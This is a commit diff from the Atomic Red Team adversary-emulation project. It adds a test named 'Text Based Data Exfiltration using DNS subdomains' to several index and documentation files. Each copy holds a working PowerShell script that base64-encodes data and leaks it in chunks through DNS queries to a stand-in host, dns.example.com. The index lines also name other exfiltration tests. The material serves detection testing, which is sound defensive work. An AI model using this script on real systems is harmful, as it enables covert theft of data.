Generated docs from job=generate-docs branch=master [ci skip]

redcanaryco · Jan 29, 2024 · 45138fd · 45138fd
1 parent 5836fe0
commit 45138fd
Show file tree

Hide file tree

Showing 9 changed files with 129 additions and 2 deletions.
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
@@ -1877,6 +1877,7 @@ exfiltration,T1020,Automated Exfiltration,2,Exfiltration via Encrypted FTP,5b380
 exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,1,Exfiltrate data HTTPS using curl windows,1cdf2fb0-51b6-4fd8-96af-77020d5f1bf0,command_prompt
 exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,2,"Exfiltrate data HTTPS using curl freebsd,linux or macos",4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01,bash
 exfiltration,T1041,Exfiltration Over C2 Channel,1,C2 Data Exfiltration,d1253f6e-c29b-49dc-b466-2147a6191932,powershell
+exfiltration,T1041,Exfiltration Over C2 Channel,2,Text Based Data Exfiltration using DNS subdomains,c9207f3e-213d-4cc7-ad2a-7697a7237df9,powershell
 exfiltration,T1048,Exfiltration Over Alternative Protocol,1,Exfiltration Over Alternative Protocol - SSH,f6786cc8-beda-4915-a4d6-ac2f193bb988,sh
 exfiltration,T1048,Exfiltration Over Alternative Protocol,2,Exfiltration Over Alternative Protocol - SSH,7c3cb337-35ae-4d06-bf03-3032ed2ec268,sh
 exfiltration,T1048,Exfiltration Over Alternative Protocol,3,DNSExfiltration (doh),c943d285-ada3-45ca-b3aa-7cd6500c6a48,powershell

diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -1224,6 +1224,7 @@ exfiltration,T1020,Automated Exfiltration,1,IcedID Botnet HTTP PUT,9c780d3d-3a14
 exfiltration,T1020,Automated Exfiltration,2,Exfiltration via Encrypted FTP,5b380e96-b0ef-4072-8a8e-f194cb9eb9ac,powershell
 exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,1,Exfiltrate data HTTPS using curl windows,1cdf2fb0-51b6-4fd8-96af-77020d5f1bf0,command_prompt
 exfiltration,T1041,Exfiltration Over C2 Channel,1,C2 Data Exfiltration,d1253f6e-c29b-49dc-b466-2147a6191932,powershell
+exfiltration,T1041,Exfiltration Over C2 Channel,2,Text Based Data Exfiltration using DNS subdomains,c9207f3e-213d-4cc7-ad2a-7697a7237df9,powershell
 exfiltration,T1048,Exfiltration Over Alternative Protocol,3,DNSExfiltration (doh),c943d285-ada3-45ca-b3aa-7cd6500c6a48,powershell
 exfiltration,T1567.003,Exfiltration Over Web Service: Exfiltration to Text Storage Sites,1,Exfiltrate data with HTTP POST to text storage sites - pastebin.com (Windows),c2e8ab6e-431e-460a-a2aa-3bc6a32022e3,powershell
 exfiltration,T1567.002,Exfiltration Over Web Service: Exfiltration to Cloud Storage,1,Exfiltrate data with rclone to cloud Storage - Mega (Windows),8529ee44-279a-4a19-80bf-b846a40dda58,powershell

diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
@@ -2708,6 +2708,7 @@
   - Atomic Test #2: Exfiltrate data HTTPS using curl freebsd,linux or macos [macos, linux]
 - [T1041 Exfiltration Over C2 Channel](../../T1041/T1041.md)
   - Atomic Test #1: C2 Data Exfiltration [windows]
+  - Atomic Test #2: Text Based Data Exfiltration using DNS subdomains [windows]
 - [T1048 Exfiltration Over Alternative Protocol](../../T1048/T1048.md)
   - Atomic Test #1: Exfiltration Over Alternative Protocol - SSH [macos, linux]
   - Atomic Test #2: Exfiltration Over Alternative Protocol - SSH [macos, linux]

diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -1811,6 +1811,7 @@
   - Atomic Test #1: Exfiltrate data HTTPS using curl windows [windows]
 - [T1041 Exfiltration Over C2 Channel](../../T1041/T1041.md)
   - Atomic Test #1: C2 Data Exfiltration [windows]
+  - Atomic Test #2: Text Based Data Exfiltration using DNS subdomains [windows]
 - [T1048 Exfiltration Over Alternative Protocol](../../T1048/T1048.md)
   - Atomic Test #3: DNSExfiltration (doh) [windows]
 - T1052.001 Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
@@ -111138,6 +111138,43 @@ exfiltration:
           = $false\n$filecontent = Get-Content -Path #{filepath}\nInvoke-WebRequest
           -Uri #{destination_url} -Method POST -Body $filecontent -DisableKeepAlive\n"
         name: powershell
+    - name: Text Based Data Exfiltration using DNS subdomains
+      auto_generated_guid: c9207f3e-213d-4cc7-ad2a-7697a7237df9
+      description: 'Simulates an adversary using DNS tunneling to exfiltrate data
+        over a Command and Control (C2) channel.
+
+        '
+      supported_platforms:
+      - windows
+      input_arguments:
+        dns_server:
+          description: DNS server IP address or domain name.
+          type: url
+          default: dns.example.com
+        exfiltrated_data:
+          description: Data to be exfiltrated.
+          type: string
+          default: SecretDataToExfiltrate
+        chunk_size:
+          description: Size of each DNS query chunk (in characters).
+          type: integer
+          default: 63
+      executor:
+        command: |
+          $dnsServer = "#{dns_server}"
+          $exfiltratedData = "#{exfiltrated_data}"
+          $chunkSize = #{chunk_size}
+
+          $encodedData = [System.Text.Encoding]::UTF8.GetBytes($exfiltratedData)
+          $encodedData = [Convert]::ToBase64String($encodedData)
+          $chunks = $encodedData -split "(.{$chunkSize})"
+
+          foreach ($chunk in $chunks) {
+              $dnsQuery = $chunk + "." + $dnsServer
+              Resolve-DnsName -Name $dnsQuery
+              Start-Sleep -Seconds 5
+          }
+        name: powershell
   T1048:
     technique:
       modified: '2023-04-15T00:58:36.287Z'

diff --git a/atomics/Indexes/windows-index.yaml b/atomics/Indexes/windows-index.yaml
@@ -91277,6 +91277,43 @@ exfiltration:
           = $false\n$filecontent = Get-Content -Path #{filepath}\nInvoke-WebRequest
           -Uri #{destination_url} -Method POST -Body $filecontent -DisableKeepAlive\n"
         name: powershell
+    - name: Text Based Data Exfiltration using DNS subdomains
+      auto_generated_guid: c9207f3e-213d-4cc7-ad2a-7697a7237df9
+      description: 'Simulates an adversary using DNS tunneling to exfiltrate data
+        over a Command and Control (C2) channel.
+
+        '
+      supported_platforms:
+      - windows
+      input_arguments:
+        dns_server:
+          description: DNS server IP address or domain name.
+          type: url
+          default: dns.example.com
+        exfiltrated_data:
+          description: Data to be exfiltrated.
+          type: string
+          default: SecretDataToExfiltrate
+        chunk_size:
+          description: Size of each DNS query chunk (in characters).
+          type: integer
+          default: 63
+      executor:
+        command: |
+          $dnsServer = "#{dns_server}"
+          $exfiltratedData = "#{exfiltrated_data}"
+          $chunkSize = #{chunk_size}
+
+          $encodedData = [System.Text.Encoding]::UTF8.GetBytes($exfiltratedData)
+          $encodedData = [Convert]::ToBase64String($encodedData)
+          $chunks = $encodedData -split "(.{$chunkSize})"
+
+          foreach ($chunk in $chunks) {
+              $dnsQuery = $chunk + "." + $dnsServer
+              Resolve-DnsName -Name $dnsQuery
+              Start-Sleep -Seconds 5
+          }
+        name: powershell
   T1048:
     technique:
       modified: '2023-04-15T00:58:36.287Z'

diff --git a/atomics/T1041/T1041.md b/atomics/T1041/T1041.md
@@ -6,6 +6,8 @@
 
 - [Atomic Test #1 - C2 Data Exfiltration](#atomic-test-1---c2-data-exfiltration)
 
+- [Atomic Test #2 - Text Based Data Exfiltration using DNS subdomains](#atomic-test-2---text-based-data-exfiltration-using-dns-subdomains)
+
 
 <br/>
 
@@ -45,4 +47,51 @@ Invoke-WebRequest -Uri #{destination_url} -Method POST -Body $filecontent -Disab
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #2 - Text Based Data Exfiltration using DNS subdomains
+Simulates an adversary using DNS tunneling to exfiltrate data over a Command and Control (C2) channel.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** c9207f3e-213d-4cc7-ad2a-7697a7237df9
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| dns_server | DNS server IP address or domain name. | url | dns.example.com|
+| exfiltrated_data | Data to be exfiltrated. | string | SecretDataToExfiltrate|
+| chunk_size | Size of each DNS query chunk (in characters). | integer | 63|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$dnsServer = "#{dns_server}"
+$exfiltratedData = "#{exfiltrated_data}"
+$chunkSize = #{chunk_size}
+
+$encodedData = [System.Text.Encoding]::UTF8.GetBytes($exfiltratedData)
+$encodedData = [Convert]::ToBase64String($encodedData)
+$chunks = $encodedData -split "(.{$chunkSize})"
+
+foreach ($chunk in $chunks) {
+    $dnsQuery = $chunk + "." + $dnsServer
+    Resolve-DnsName -Name $dnsQuery
+    Start-Sleep -Seconds 5
+}
+```
+
+
+
+
+
+
 <br/>